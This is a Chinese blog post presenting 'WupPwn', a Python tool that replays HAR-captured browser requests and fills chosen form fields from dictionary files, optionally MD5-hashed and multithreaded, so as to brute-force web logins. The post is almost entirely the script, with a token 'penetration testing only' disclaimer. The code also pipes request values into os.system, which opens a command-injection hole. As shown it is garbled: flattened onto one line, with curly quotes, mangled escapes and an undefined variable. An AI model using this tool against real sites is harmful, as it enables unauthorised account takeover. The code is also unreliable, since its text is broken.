利用Chrome或Firefox保存的Har文件http/https請(qǐng)求，可用于遍歷字典提交From表單.

少說廢話直接上代碼

Github地址:https://github.com/H0xMrLin/wuppwn

#encoding:utf-8import sys;#Yeah,我沒有注釋。懶得寫HelpContent='''Help:+=====================================================================================================================+ WupPwn.pyPython3 WupPwn.py HarFileName [pd=filedName:Value|pd=filedName:$DicFileName] [if=responseContent] [ifnot=responseContent] [ifend=responseContent] [out=OutFileName] HarFileName har文件名 谷歌或Firefox web抓包保存為har entries下可以看到所有請(qǐng)求的地址及參數(shù) 可以刪除一些不必要的請(qǐng)求讓程序更快運(yùn)行 pd 設(shè)置上傳數(shù)據(jù) 字段名:值 或者 字段名:字典 if=xxx 如果內(nèi)容是xxx那就記錄 可多個(gè)用||隔開 ifnot=xxx 如果內(nèi)容不是xxx哪就記錄 可多個(gè)用||隔開 ifend=xxx 如果內(nèi)容是xxx那就記錄并結(jié)束 可多個(gè)用||隔開 out=xx.txt 輸出記錄到文件 see=on|off 查看每次嘗試破解響應(yīng) Current request method have: GET/POST *且目前不支持http請(qǐng)求頭帶 RFC 標(biāo)識(shí) (RFC-eg: ’:method’:’POST’)可以檢查是否有 md5=XXX 將 指定字段名的值進(jìn)行md5加密再暴力破解 一般=password||passwd||pwd ... th=5 設(shè)置5個(gè)線程同時(shí)運(yùn)行 版本警告: 《!》: 切勿用作違法使用，僅供滲透測(cè)試，如非法使用該工具與作者無關(guān)。 Makerby:Pwn0_+x_X+=====================================================================================================================+''';if(len(sys.argv) <=1): print(HelpContent); sys.exit(1);if(sys.argv[1].lower()=='h' or sys.argv[1].lower()=='-h' or sys.argv[1].lower()=='help'or sys.argv[1].lower()=='-help'): print(HelpContent); sys.exit(1);import os;import json;import urllib.request;import requests;import socket;import hashlib;import threading;import traceback;import uuid;import copyfrom hyper.contrib import HTTP20Adapter;socket.setdefaulttimeout(3);CAllowRequestMethod=['get','post'];HARFile=sys.argv[1];harfp=open(HARFile,'rb');harContent=harfp.read();HarJSON=json.loads(harContent);Body=HarJSON['log']print('Version :'+Body['version']);print('Request Count :'+str( len(Body['entries'])))AimUrlAPar={};for reqBody in Body['entries']: AimUrlAPar[reqBody['request']['url']]={}; AllowRequest='×'; if(reqBody['request']['method'].lower() in CAllowRequestMethod): AllowRequest='√'; else: print(' '*5,'[',AllowRequest,']',reqBody['request']['method'],'tt'+reqBody['request']['url'].split('?')[0]) continue; print(' '*5,'[',AllowRequest,']',reqBody['request']['method'],'tt'+reqBody['request']['url'].split('?')[0]) Parameter= reqBody['request']['queryString'] if reqBody['request']['method'].lower()=='get' else reqBody['request']['postData']['text'] #print(Parameter) if(reqBody['request']['method'].lower()=='post'): if 'application/json' in reqBody['request']['postData']['mimeType']: Parameter=json.loads(Parameter) else: Parameter=reqBody['request']['postData']['params']; tmpPar={}; for item in Parameter: tmpPar[item['name']]=item['value']; Parameter=tmpPar; AimUrlAPar[reqBody['request']['url']]['paramtertype']=reqBody['request']['postData']['mimeType'].lower() elif(reqBody['request']['method'].lower()=='get'): Par={}; #print('get') for item in Parameter: Par[item['name']]=item['value'] Parameter=Par; headers={}; headNotContains=['Content-Length']; for headFiled in reqBody['request']['headers']: if headFiled['name'] in headNotContains: continue; headers[headFiled['name']]=headFiled['value']; cookies={}; for headFiled in reqBody['request']['cookies']: cookies[headFiled['name']]=headFiled['value']; #print(cookies); AimUrlAPar[reqBody['request']['url']]['arguments']=Parameter AimUrlAPar[reqBody['request']['url']]['header']=headers AimUrlAPar[reqBody['request']['url']]['cookies']=cookies AimUrlAPar[reqBody['request']['url']]['method']=reqBody['request']['method'].lower() AimUrlAPar[reqBody['request']['url']]['httpversion']=reqBody['request']['httpVersion'].lower() #系統(tǒng)存儲(chǔ)kPMd5={}; #用戶參數(shù)設(shè)定pds=[];ifC=[];# 最小優(yōu)先級(jí)ifN=[];# 其二優(yōu)先級(jí)ifE=[];# 最大優(yōu)先級(jí)otFile='';ascMD5=[];testsee='off';see='off';th=0;#因?yàn)槲也惶矚g指令的參數(shù)化模塊 所以我直接寫了個(gè)硬代碼 注：python的模塊有時(shí)候很討厭.def setBaseParamters(Key,Value): global see,otFile,testsee,th; Key=Key.lower(); if(Key=='pd'): FILEDSUM=Value.split(':'); filedName=FILEDSUM[0]; filedValue=FILEDSUM[1]; if(filedValue[0]=='$'): apArr=[]; filedP=open(filedValue[1:],'r'); redValueLines=filedP.readlines(); for val in redValueLines: apArr.append({filedName:val.replace('n','')}); pds.append(apArr); else: pds.append([{filedName:filedValue}]); elif(Key=='if'): ifcItems=Value.split('||'); for item in ifcItems: ifC.append(item); elif(Key=='ifnot'): ifcItems=Value.split('||'); for item in ifcItems: ifN.append(item); elif(Key=='ifend'): ifcItems=Value.split('||'); for item in ifcItems: ifE.append(item); elif(Key=='md5'): md5Items=Value.split('||'); for item in md5Items: ascMD5.append(item); elif(Key=='see'): see=Value.strip().lower(); elif(Key=='out'): otFile=Value.strip().lower(); elif(Key=='testsee'): testsee=Value.strip().lower(); elif(Key=='th'): th=int(Value.strip().lower()); return;curThs={};def pdLoop(index,havePar={},myThead=None): global curThs,kPMd5; for item in pds[index]: FiledName=list(item.keys())[0]; FiledValue=list(item.values())[0]; if(FiledName in ascMD5): m5Obj=hashlib.md5(bytes(FiledValue,encoding='UTF-8')); SourceValue=FiledValue; FiledValue=m5Obj.hexdigest(); kPMd5[FiledValue]=SourceValue; havePar[FiledName]=FiledValue; if(index>0): if(th>0 and len(curThs)<th ): print('[+]線程記錄點(diǎn)') childThread=str(uuid.uuid1()).replace('-',''); RunTh= threading.Thread(target=pdLoop,args=(index-1,copy.deepcopy(havePar),childThread,));curThs[childThread]=RunTh; RunTh.start(); else: pdLoop(index-1,copy.deepcopy(havePar)); else: Call(havePar); if(myThead!=None): print('[+]線程釋放點(diǎn)',myThead) curThs.pop(myThead);def Call(sendData): for reqUrl in list(AimUrlAPar.keys()): CurHeaders= AimUrlAPar[reqUrl]['header']; CurHeaders['Cookie']=''; CurCookies= AimUrlAPar[reqUrl]['cookies']; for cookieKey in list(CurCookies.keys()): CurHeaders['Cookie']+=cookieKey+'='+CurCookies[cookieKey]+';' #print(cookieKey+'='+CurCookies[cookieKey]+';'); CurArguments= AimUrlAPar[reqUrl]['arguments']; for cgDataKey in list(sendData.keys()): CurArguments[cgDataKey]=sendData[cgDataKey]; try: if(AimUrlAPar[reqUrl]['method']=='get'): print('[+]GET-Pwn:%s'%(reqUrl)); #data = urllib.parse.urlencode(CurArguments).encode(’utf-8’); if(AimUrlAPar[reqUrl]['httpversion']=='http/2.0'): sessions.mount(reqUrl,HTTP20Adapter()); res=requests.get(reqUrl,headers=CurHeaders,params=CurArguments); print(res.text); Auth(CurArguments,res.text); elif(AimUrlAPar[reqUrl]['method']=='post'): ''' data = urllib.parse.urlencode(CurArguments).encode(’utf-8’) request = urllib.request.Request(reqUrl,data = data,headers = CurHeaders,method='POST'); response = urllib.request.urlopen(request) html = response.read().decode(’utf-8’)''' if(AimUrlAPar[reqUrl]['paramtertype']=='application/x-www-form-urlencoded'): data = urllib.parse.urlencode(CurArguments).encode(’utf-8’) else: data = json.dumps(CurArguments); sessions=requests.session(); if(AimUrlAPar[reqUrl]['httpversion']=='http/2.0'): sessions.mount(reqUrl,HTTP20Adapter()); res=sessions.post(reqUrl,data=data,headers=CurHeaders); Auth(CurArguments,res.text); None; except Exception as e: print('[-]Pwn timeout',traceback.print_exc(),kPMd5) def Auth(Arguments,resContent): Success=False; Arguments=copy.deepcopy(Arguments) for argItemName in list(Arguments.keys()): if(argItemName in ascMD5): Arguments[argItemName]=kPMd5[Arguments[argItemName]]; #print(ifE,ifC,ifN) for ifeItem in ifE: if(ifeItem in resContent): Output(str(Arguments)); sys.exit(1); for ifnItem in ifN: if not(ifnItem in resContent ): Output(str(Arguments)); Success=True for ifcItem in ifC: if (ifcItem in resContent ): Output(str(Arguments)); Success=True if(see==’on’): print({True:'t[√]',False:'[-]'}[Success],Success,Arguments); if(testsee=='on'): print(resContent); def Output(text): if(otFile.strip() == ''): return; os.system('echo %s>>%s'%(text,otFile)); return ; for index in range(len(sys.argv)-2): parIndex=index+2; parItem= sys.argv[parIndex]; try: Item= parItem.split('='); key=Item[0]; value=Item[1]; setBaseParamters(key,value); except: print('Error paramter(%s)'%(parItem));#print(AimUrlAPar);if(len(pds)-1>=0): pdLoop(len(pds)-1)

總結(jié)

到此這篇關(guān)于Python如何利用Har文件進(jìn)行遍歷指定字典替換提交的數(shù)據(jù)的文章就介紹到這了,更多相關(guān)Python用Har文件遍歷指定字典替換提交的數(shù)據(jù)內(nèi)容請(qǐng)搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)！